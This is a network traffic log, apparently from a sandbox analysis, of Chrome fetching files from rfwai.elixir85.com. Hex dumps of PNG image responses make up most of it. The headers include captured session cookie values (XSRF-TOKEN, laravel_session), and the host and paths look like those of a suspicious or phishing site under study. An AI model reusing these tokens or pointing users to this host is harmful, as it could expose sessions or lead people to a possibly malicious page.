                                                        2024-07-03 19:07:25 UTC1369INData Raw: cb 92 1a 76 a2 cf bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe
                                                        Data Ascii: v(Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&
                                                        2024-07-03 19:07:25 UTC1369INData Raw: a4 6e 72 10 f1 f7 e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1
                                                        Data Ascii: nr\uF3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC
                                                        2024-07-03 19:07:25 UTC1369INData Raw: e0 ef c0 59 c0 0a c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8
                                                        Data Ascii: YY$I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+p
                                                        2024-07-03 19:07:25 UTC1369INData Raw: 18 a9 6e aa 76 4f d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5
                                                        Data Ascii: nvO0:JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8
                                                        2024-07-03 19:07:25 UTC1369INData Raw: bd c8 1d 7d 5e e4 aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00
                                                        Data Ascii: }^ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ
                                                        2024-07-03 19:07:25 UTC1369INData Raw: b6 0b 70 60 74 08 49 92 24 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c d2 53
                                                        Data Ascii: p`tI$I-%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,S


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        80192.168.2.549813104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:24 UTC1114OUTGET /uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:25 UTC643INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:25 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 231
                                                        Connection: close
                                                        Content-Disposition: inline; filename="uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3z2AfduShc%2BIBE15aKZKDeinGkaEMfxV1rmnSq27l22kCVsx9EYLteKwL3Z0I8Kw3YhCPjLzv%2BFrYiUk%2Bw%2FFfPF9SxM9EVTSZIrcToseocwspg1mD7LFuXqhf3Guxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92887fcba4346-EWR
                                                        2024-07-03 19:07:25 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        81192.168.2.549814104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:24 UTC1453OUTGET /op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:25 UTC661INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:25 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 29796
                                                        Connection: close
                                                        Content-Disposition: inline; filename="op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2FOqjhOXefVLt1e7jhEzZ%2BuD0WeVfa8VkMjAzmL7uV42vUiQ0sRdnuFPTHmGNu1WWvmTMZBGLJugyhye6jifKHk%2Bvp1LAyb55HH2qD0jIX07se69FArLFDftURYlLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d928899b164216-EWR
                                                        2024-07-03 19:07:25 UTC708INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                        Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                        2024-07-03 19:07:25 UTC1369INData Raw: cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b 48 fc 98 90 a5 65 e6 e6 79 e0 e8 52 18 4e
                                                        Data Ascii: /?+bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7HeyRN
                                                        2024-07-03 19:07:25 UTC1369INData Raw: 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2 0a 0f 66 8c 1a 08 30 a2 57 03 34 23 68 a2
                                                        Data Ascii: NMc.[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSFf0W4#h
                                                        2024-07-03 19:07:25 UTC1369INData Raw: af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81 90 9d 3d b2 b9 e7 2b 57 a9 82 35 ab 57 f3
                                                        Data Ascii: Q1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT=+W5W
                                                        2024-07-03 19:07:25 UTC1369INData Raw: 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93 ca 2e 5f b1 0a da 86 48 ce 42 27 e5 f2 b9
                                                        Data Ascii: l[|hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9._HB'
                                                        2024-07-03 19:07:25 UTC1369INData Raw: 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18 39 12 bd 7a f4 d0 0a 26 2d 5b b6 e4 22
                                                        Data Ascii: 8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq9z&-["
                                                        2024-07-03 19:07:25 UTC1369INData Raw: 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b e2 3f bc a7 b7 e9 9f 44
                                                        Data Ascii: =#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;?D
                                                        2024-07-03 19:07:25 UTC1369INData Raw: c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90 fc 7d 07 88 be c6 17 6d
                                                        Data Ascii: oO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^}m
